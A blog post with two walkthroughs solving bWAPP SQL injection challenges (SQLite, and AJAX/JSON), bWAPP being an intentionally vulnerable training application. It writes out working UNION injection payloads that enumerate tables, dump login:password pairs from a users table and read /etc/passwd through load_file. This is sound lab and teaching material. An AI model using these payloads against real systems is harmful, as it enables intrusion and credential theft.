bWAPP SQL Injection (SQLite)

Introduction

Hi again. Today I have decided to document yet another unpublished challenge presented in bWAPP. This challenge concerns SQL Injection while the server uses the SQLite engine.

I will try to make this post relatively short, explaining the following:

  • Getting To Know Our Target
  • Finding Database Information (tables/columns/sqlite version)
  • Extracting Database Information
  • Last Words

Getting To Know Our Target

On this section of this thread, I want to spend some time talking about finding the SQL Injection vulnerability that exists and also some prep work that has to be done to get to our working injection.

This challenge has a very similar layout as the previous bWAPP challenge I posted; it allow users to search for movies titles. The vulnerability in itself is not difficult to find. Placing an apostrophe in the search string will induce an error:

sqlite_error

The page reveals a vague “Error: HY000” error message. I spent a few moments searching on Google for relevant results, but the information I was coming across not very useful. I am fairly confident in exploiting SQLi vulnerabilities, so I approached this challenge as I normally would.

The first step I took was to find out how many columns existed in the table that used in my query. The only problem with this error message is that it was not very informative in any way. I knew that any syntax error or incorrect information that I sent was going to produce this error. Using ORDER BY helped me get one step closer to the solution.

iron’ order by 300– <– Error: HY000
iron' order by 1– <– No error

I knew this was the path to exploitation and that my thoughts were on the right track. Few instances later, I discovered that there were 6 columns.

sqlite_columns

This was the preparation I required before I could proceed discovering more information about the database. This will be the transition to our next topic.

Finding Database Information (tables/columns/sqlite version)

Before I started to inject this web page, I knew what kind of information I was looking for. The issue was, I was not familiar with SQLite syntax. After looking at some SQLite documentation, I gathered enough information to know how to concatenate strings, find the SQLite version, and obtaining the tables and columns.

The following injections demonstrate the aforementioned concepts, thus completing the challenge.

Finding SQLite version:

'union+select+1,2,sqlite_version(),4,5,6--+-

sqlite_version

Finding database tables:

'union+select+1,2,name,4,5,6 from sqlite_master--+-

sqlite_name

This next injection will demonstrate how to retrieve the DDL statements used when creating the tables for the database. This will effectively reveal the tables and columns. The injection follows:

'union+select+1,2,sql,4,5,6 from sqlite_master--+-

sqlite_sql

The above image depicts the information needed; the login and password columns for the users table.

Extracting the login and password from the users table:

union+select+1,2,login||":"||password,4,5,6 from users--+-

sqlite_data_extraction

SQLite uses “||” as the operator to concatenate strings together. In this case, we are joining the login and password with a colon.

Last Words

This concludes this thread. As always, I really hope that you can take something from this reading. Although SQLite is not as popular as other RDBMSs, information disclosure can still be achieved via SQL injection.

Happy hacking!

Advertisements

bWAPP SQL Injection (AJAX/JSON/jQuery) Challenge

Introduction

On this thread, I will be posting the solution to the SQL Injection (AJAX/JSON/jQuery) challenge that can be found on the vulnerable bWAPP virtual machine. I have decided to post the solution because I could not find one available online.

This documentation will demonstrate how to exploit SQL injection flaws with the involvement of web technologies such as AJAX, JSON, and jQuery. I will be using the Burp Suite to intercept the requests being sent from my web browser and modifying them to test for vulnerabilities.

Tools being used:

Description Download
bWAPP http://www.itsecgames.com/
Burp Suite https://portswigger.net/burp/download.html

Getting To Know Your Target

This challenge starts off with with a search feature that can pose a potential threat to the web application. As users type in the search bar, movies begin to populate in a table according to what is being searched. This challenge is distinct from other SQLi challenges because the use of AJAX and JSON provides a real-time feed of the information begin requested. The images below captures this concept.

Screenshot from 2016-05-05 17:00:53

Screenshot from 2016-05-05 17:01:01

Tampering with the URL to generate an SQL syntax error will not be possible with this challenge.

nosqlierror

That being said, it is a good idea to intercept the client’s request and server’s response to get a better picture of how this application is working. Let’s see what happens when an apostrophe is inserted in the request.

Screenshot from 2016-05-05 17:05:05

A SQL syntax error is now apparent, being a good indication of an SQLi flaw. Now that we found our injection point, formulating working injection that will be able to speak to the database is our next step. When I was first attempting to solve this challenge, I tried many injections to no avail. It was very obvious to me that I needed a better understanding on what the SQL code in the background was doing, which transitions us to our next topic of discussion.

Analysing SQL Code For Flaws

Fortunately, we are given access to the bWAPP virtual machine. Soon I found the SQL code that was managing my requests to be the following:

$sql = "SELECT * FROM movies WHERE title LIKE '%" . sqli($title) . "%'";

Screenshot from 2016-05-05 17:07:12

I never thought that I would be tampering with the SQL LIKE statement. My mind quickly simplified this code and wrote it down to start developing a working syntax to exploit the application:

$sql = "SELECT * FROM movies WHERE title LIKE '%iron%'";

I knew that essentially the above code was the request that was being interpreted.

Finding a Working Injection Point

Now that I understood the query being used, it was time to start testing some of my suspicions.

The search feature offered by this challenge allows users to search for any movie titles as it automatically populates the results. For example, you can search for Iron Man or Terminator, but the results can’t never yield both; unless we inject an extra LIKE statement.

In theory, we can get both movies to show up with the following injection:

iron%' or title like '%term

This will make the back-end SQL code look like this:

$sql = "SELECT * FROM movies WHERE title LIKE '%iron%' or title like '%term%'";

Screenshot from 2016-05-05 17:08:21

As anticipated, the search results contained both movies.

Extracting Database Information

Now that I had a working injection, I had to figure out how many columns exist in the Movies table. This missing portion of the puzzle was discovered by looking at the server’s response:

[{“0″:”2″,”id”:”2″,”1″:”Iron Man”,”title”:”Iron Man”,”2″:”2008″,”release_year”:”2008″,”3″:”action”,”genre”:”action”,”4″:”Tony Stark”,”main_character”:”Tony Stark”,”5″:”tt0371746″,”imdb”:”tt0371746″,”6″:”53″,”tickets_stock”:”53″}]

You can see that there are 7 columns based on the data. This was my opportunity to start extracting some information from the database and files from the server. This injection was very tricky because it only works as I will shortly demonstrate. Some of the injections I could get it to work with commenting out the code at the end, and other injections would work without commenting out the code at the end. This is strange to me because the last statement in the request was needed to complete a true statement. I’m not an SQL expert so I can live with this mystery.

Finding database version():

iron%'+union+select+1,version(),3,4,5,6,7+and'%'='

Screenshot from 2016-05-05 17:10:03

The tables can be found with the following injection:

iron%'+union+select+1,group_concat(table_name),4,5,6,7+from+information_schema.tables+where+table_schema=database()--+and'%'='

The columns for the users table can be extracted with the following injection:

iron%'+union+select+1,group_concat(column_name),4,5,6,7+from+information_schema.columns+where+table_name='users'--+and'%'='

Extracting login and password from database along with /etc/passwd file:

iron%'+union+select+1,group_concat(login,0x3a,password),load_file('/etc/passwd'),4,5,6,7+from+users--+and'%'='

Screenshot from 2016-05-05 17:56:25

Last Words

The key to completing this challenge rests within figuring out a way to inject the LIKE statement. Finding the vulnerability in this challenge was not difficult, but most of my time was spent discovering a working injection.

Hopefully you have learned something from this short reading. If you have any suggestion on what topics to cover or discuss next, please let me know.

Happy hacking!